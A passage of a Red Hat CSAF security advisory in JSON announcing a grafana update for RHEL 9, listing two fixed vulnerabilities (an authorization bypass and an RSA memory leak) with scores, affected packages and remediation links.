"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for grafana is now available for Red Hat Enterprise Linux 9.\n\nRed Hat Product Security has rated this update as having a security impact of\nModerate. A Common Vulnerability Scoring System (CVSS) base score, which gives\na detailed severity rating, is available for each vulnerability from the CVE\nlink(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Grafana is an open source, feature rich metrics dashboard and graph editor for Graphite, InfluxDB \u0026 OpenTSDB.\n\nSecurity Fix(es):\n\n* grafana: golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394)\n\n* grafana: vulnerable to authorization bypass (CVE-2024-1313)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:2568",
"url": "https://access.redhat.com/errata/RHSA-2024:2568"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "2262921",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2262921"
},
{
"category": "external",
"summary": "2271903",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2271903"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_2568.json"
}
],
"title": "Red Hat Security Advisory: grafana security update",
"tracking": {
"current_release_date": "2026-04-23T01:37:23+00:00",
"generator": {
"date": "2026-04-23T01:37:23+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2024:2568",
"initial_release_date": "2024-04-30T13:33:21+00:00",
"revision_history": [
{
"date": "2024-04-30T13:33:21+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-04-30T13:33:21+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-23T01:37:23+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream (v. 9)",
"product": {
"name": "Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:enterprise_linux:9::appstream"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "grafana-0:9.2.10-16.el9_4.src",
"product": {
"name": "grafana-0:9.2.10-16.el9_4.src",
"product_id": "grafana-0:9.2.10-16.el9_4.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/grafana@9.2.10-16.el9_4?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "grafana-0:9.2.10-16.el9_4.aarch64",
"product": {
"name": "grafana-0:9.2.10-16.el9_4.aarch64",
"product_id": "grafana-0:9.2.10-16.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/grafana@9.2.10-16.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "grafana-selinux-0:9.2.10-16.el9_4.aarch64",
"product": {
"name": "grafana-selinux-0:9.2.10-16.el9_4.aarch64",
"product_id": "grafana-selinux-0:9.2.10-16.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/grafana-selinux@9.2.10-16.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "grafana-debugsource-0:9.2.10-16.el9_4.aarch64",
"product": {
"name": "grafana-debugsource-0:9.2.10-16.el9_4.aarch64",
"product_id": "grafana-debugsource-0:9.2.10-16.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/grafana-debugsource@9.2.10-16.el9_4?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "grafana-debuginfo-0:9.2.10-16.el9_4.aarch64",
"product": {
"name": "grafana-debuginfo-0:9.2.10-16.el9_4.aarch64",
"product_id": "grafana-debuginfo-0:9.2.10-16.el9_4.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/grafana-debuginfo@9.2.10-16.el9_4?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "grafana-0:9.2.10-16.el9_4.ppc64le",
"product": {
"name": "grafana-0:9.2.10-16.el9_4.ppc64le",
"product_id": "grafana-0:9.2.10-16.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/grafana@9.2.10-16.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "grafana-selinux-0:9.2.10-16.el9_4.ppc64le",
"product": {
"name": "grafana-selinux-0:9.2.10-16.el9_4.ppc64le",
"product_id": "grafana-selinux-0:9.2.10-16.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/grafana-selinux@9.2.10-16.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "grafana-debugsource-0:9.2.10-16.el9_4.ppc64le",
"product": {
"name": "grafana-debugsource-0:9.2.10-16.el9_4.ppc64le",
"product_id": "grafana-debugsource-0:9.2.10-16.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/grafana-debugsource@9.2.10-16.el9_4?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "grafana-debuginfo-0:9.2.10-16.el9_4.ppc64le",
"product": {
"name": "grafana-debuginfo-0:9.2.10-16.el9_4.ppc64le",
"product_id": "grafana-debuginfo-0:9.2.10-16.el9_4.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/grafana-debuginfo@9.2.10-16.el9_4?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "grafana-0:9.2.10-16.el9_4.x86_64",
"product": {
"name": "grafana-0:9.2.10-16.el9_4.x86_64",
"product_id": "grafana-0:9.2.10-16.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/grafana@9.2.10-16.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "grafana-selinux-0:9.2.10-16.el9_4.x86_64",
"product": {
"name": "grafana-selinux-0:9.2.10-16.el9_4.x86_64",
"product_id": "grafana-selinux-0:9.2.10-16.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/grafana-selinux@9.2.10-16.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "grafana-debugsource-0:9.2.10-16.el9_4.x86_64",
"product": {
"name": "grafana-debugsource-0:9.2.10-16.el9_4.x86_64",
"product_id": "grafana-debugsource-0:9.2.10-16.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/grafana-debugsource@9.2.10-16.el9_4?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "grafana-debuginfo-0:9.2.10-16.el9_4.x86_64",
"product": {
"name": "grafana-debuginfo-0:9.2.10-16.el9_4.x86_64",
"product_id": "grafana-debuginfo-0:9.2.10-16.el9_4.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/grafana-debuginfo@9.2.10-16.el9_4?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "grafana-0:9.2.10-16.el9_4.s390x",
"product": {
"name": "grafana-0:9.2.10-16.el9_4.s390x",
"product_id": "grafana-0:9.2.10-16.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/grafana@9.2.10-16.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "grafana-selinux-0:9.2.10-16.el9_4.s390x",
"product": {
"name": "grafana-selinux-0:9.2.10-16.el9_4.s390x",
"product_id": "grafana-selinux-0:9.2.10-16.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/grafana-selinux@9.2.10-16.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "grafana-debugsource-0:9.2.10-16.el9_4.s390x",
"product": {
"name": "grafana-debugsource-0:9.2.10-16.el9_4.s390x",
"product_id": "grafana-debugsource-0:9.2.10-16.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/grafana-debugsource@9.2.10-16.el9_4?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "grafana-debuginfo-0:9.2.10-16.el9_4.s390x",
"product": {
"name": "grafana-debuginfo-0:9.2.10-16.el9_4.s390x",
"product_id": "grafana-debuginfo-0:9.2.10-16.el9_4.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/grafana-debuginfo@9.2.10-16.el9_4?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-0:9.2.10-16.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.aarch64"
},
"product_reference": "grafana-0:9.2.10-16.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-0:9.2.10-16.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.ppc64le"
},
"product_reference": "grafana-0:9.2.10-16.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-0:9.2.10-16.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.s390x"
},
"product_reference": "grafana-0:9.2.10-16.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-0:9.2.10-16.el9_4.src as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.src"
},
"product_reference": "grafana-0:9.2.10-16.el9_4.src",
"relates_to_product_reference": "AppStream-9.4.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-0:9.2.10-16.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.x86_64"
},
"product_reference": "grafana-0:9.2.10-16.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-debuginfo-0:9.2.10-16.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.aarch64"
},
"product_reference": "grafana-debuginfo-0:9.2.10-16.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-debuginfo-0:9.2.10-16.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.ppc64le"
},
"product_reference": "grafana-debuginfo-0:9.2.10-16.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-debuginfo-0:9.2.10-16.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.s390x"
},
"product_reference": "grafana-debuginfo-0:9.2.10-16.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-debuginfo-0:9.2.10-16.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.x86_64"
},
"product_reference": "grafana-debuginfo-0:9.2.10-16.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-debugsource-0:9.2.10-16.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.aarch64"
},
"product_reference": "grafana-debugsource-0:9.2.10-16.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-debugsource-0:9.2.10-16.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.ppc64le"
},
"product_reference": "grafana-debugsource-0:9.2.10-16.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-debugsource-0:9.2.10-16.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.s390x"
},
"product_reference": "grafana-debugsource-0:9.2.10-16.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-debugsource-0:9.2.10-16.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.x86_64"
},
"product_reference": "grafana-debugsource-0:9.2.10-16.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-selinux-0:9.2.10-16.el9_4.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.aarch64"
},
"product_reference": "grafana-selinux-0:9.2.10-16.el9_4.aarch64",
"relates_to_product_reference": "AppStream-9.4.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-selinux-0:9.2.10-16.el9_4.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.ppc64le"
},
"product_reference": "grafana-selinux-0:9.2.10-16.el9_4.ppc64le",
"relates_to_product_reference": "AppStream-9.4.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-selinux-0:9.2.10-16.el9_4.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.s390x"
},
"product_reference": "grafana-selinux-0:9.2.10-16.el9_4.s390x",
"relates_to_product_reference": "AppStream-9.4.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-selinux-0:9.2.10-16.el9_4.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.x86_64"
},
"product_reference": "grafana-selinux-0:9.2.10-16.el9_4.x86_64",
"relates_to_product_reference": "AppStream-9.4.0.Z.MAIN.EUS"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-1313",
"cwe": {
"id": "CWE-639",
"name": "Authorization Bypass Through User-Controlled Key"
},
"discovery_date": "2024-03-27T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2271903"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in Grafana. Due to an error in authorization logic, it is possible for an unprivileged user in a different organization other than the snapshot owner to perform unauthorized actions such as deleting it using a view key.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "grafana: vulnerable to authorization bypass",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat rates this as a Moderate impact flaw as it still require access to perform requests against Grafana and the view access key. The attacker would need minimum privileges in order to jeopardize an environment.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.src",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.x86_64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.x86_64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.x86_64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-1313"
},
{
"category": "external",
"summary": "RHBZ#2271903",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2271903"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-1313",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1313"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-1313",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1313"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-67rv-qpw2-6qrr",
"url": "https://github.com/advisories/GHSA-67rv-qpw2-6qrr"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-mh7p-8m2f-qrm6",
"url": "https://github.com/advisories/GHSA-mh7p-8m2f-qrm6"
},
{
"category": "external",
"summary": "https://grafana.com/security/security-advisories/cve-2024-1313/",
"url": "https://grafana.com/security/security-advisories/cve-2024-1313/"
}
],
"release_date": "2024-03-26T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-04-30T13:33:21+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.src",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.x86_64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.x86_64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.x86_64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:2568"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.src",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.x86_64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.x86_64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.x86_64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.src",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.x86_64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.x86_64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.x86_64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-selinux-0:9.2.10-16.el9_4.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "grafana: vulnerable to authorization bypass"
},
{
"acknowledgments": [
{
"names": [
"@r3kumar",
"@qmuntal"
]
}
],
"cve": "CVE-2024-1394",
"cwe": {
"id": "CWE-401",
"name": "Missing Release of Memory after Effective Lifetime"
},
"discovery_date": "2024-02-06T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2262921"
}
],
"notes": [
{
"category": "description",
"text": "A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The majority of RHEL utilities are not long-running applications; instead, they are command-line tools. These tools utilize Golang package as build-time dependency, which is why they are classified as having a \"Moderate\" level of impact.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.src",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-0:9.2.10-16.el9_4.x86_64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debuginfo-0:9.2.10-16.el9_4.x86_64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.aarch64",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.ppc64le",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.s390x",
"AppStream-9.4.0.Z.MAIN.EUS:grafana-debugsource-0:9.2.10-16.el9_4.x86_64",
